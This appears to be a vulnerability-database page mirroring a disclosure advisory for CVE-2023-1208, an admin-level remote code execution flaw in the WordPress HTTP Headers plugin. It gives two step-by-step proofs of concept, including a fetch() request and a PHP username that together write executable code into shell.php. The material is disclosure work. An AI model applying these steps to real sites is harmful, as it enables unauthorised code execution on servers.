Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitQerogram(at Kakao Style Corp.)WPEX-ID:E0CC6740-866A-4A81-A93D-FF486B79B7F7
HistoryJun 19, 2023 - 12:00 a.m.

HTTP Headers < 1.18.11 - Admin+ Remote Code Execution

2023-06-1900:00:00
qerogram(at Kakao Style Corp.)
60
http headers
admin
remote code execution
vulnerable site
settings
authentication
apache-based servers
exploit

0.002 Low

EPSS

Percentile

57.4%

JSON

This plugin allows arbitrary data to be written to arbitrary files, leading to a Remote Code Execution vulnerability.

--- <= 1.18.10 PoC ---
1. As an admin, visit http://vulnerable-site.tld/wp-admin/options-general.php?page=http-headers&tab=advanced, and paste the following in your browser's prompt:

await fetch("/wp-admin/options.php", {
    "credentials": "include",
    "headers": {
        "Content-Type": "application/x-www-form-urlencoded",
    },
    "body": `option_page=http-headers-mtd&action=update&_wpnonce=${jQuery('#_wpnonce').attr('value')}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dhttp-headers%26tab%3Dadvanced&hh_htaccess_path=%2Fvar%2Fwww%2Fhtml%2F.htaccess&hh_user_ini_path=%2Fvar%2Fwww%2Fhtml%2F.user.ini&hh_htpasswd_path=%2Fvar%2Fwww%2Fhtml%2Fshell.php&hh_htdigest_path=%2Fvar%2Fwww%2Fhtml%2F.hh-htdigest&hh_method=htaccess`,
    "method": "POST",
    "mode": "cors"
});
2. Navigate to http://vulnerable-site.tld/wp-admin/options-general.php?page=http-headers&header=www-authenticate
3. Ensure WWW-Authenticate is enabled, and fill the form with Username "<?php echo "RCE" ?>" and Password as any value.
4. Navigate to Settings > HTTP Headers > Advanced settings and set the "Location of .hh-htpasswd" field to its previous value (this is only required on Apache-based servers in order to reset a rule in the .htaccess file).
5. Go to /shell.php and see the RCE text.


--- Pre-1.18.8 PoC ---

1. As an admin user within WP Admin, navigate to Settings > HTTP Headers > Advanced settings.
2. Change the "Location of .hh-htpasswd" field: update the file name to "shell.php" (e.g. /var/www/html/shell.php)
3. Navigate to Settings > HTTP Headers > Authentication. Click "Edit" to the right of "WWW-Authenticate".
4. Ensure WWW-Authenticate is enabled, and fill the form with Username "<?php echo "RCE" ?>" and Password as any value.
5. Navigate to Settings > HTTP Headers > Advanced settings and set the "Location of .hh-htpasswd" field to its previous value (this is only required on Apache-based servers in order to reset a rule in the .htaccess file).
6. Go to /shell.php and see the RCE text.

Related

nvd 1
prion 1
cvelist 1
wpvulndb 1
cve 1
wordfence 1
nvd
nvd
CVE-2023-1208
2023-07-10 16:15:48
prion
prion
Remote code execution
2023-07-10 16:15:00
cvelist
cvelist
CVE-2023-1208 HTTP Headers < 1.18.11 - Admin+ Remote Code Execution
2023-07-10 12:41:23
wpvulndb
wpvulndb
HTTP Headers < 1.18.11 - Admin+ Remote Code Execution
2023-06-19 00:00:00
cve
cve
CVE-2023-1208
2023-07-10 16:15:48
wordfence
wordfence
Wordfence Intelligence Weekly WordPress Vulnerability Report (June 19, 2023 to June 25, 2023)
2023-06-29 13:24:24

0.002 Low

EPSS

Percentile

57.4%

JSON
Related for WPEX-ID:E0CC6740-866A-4A81-A93D-FF486B79B7F7
nvd1prion1cvelist1wpvulndb1cve1wordfence1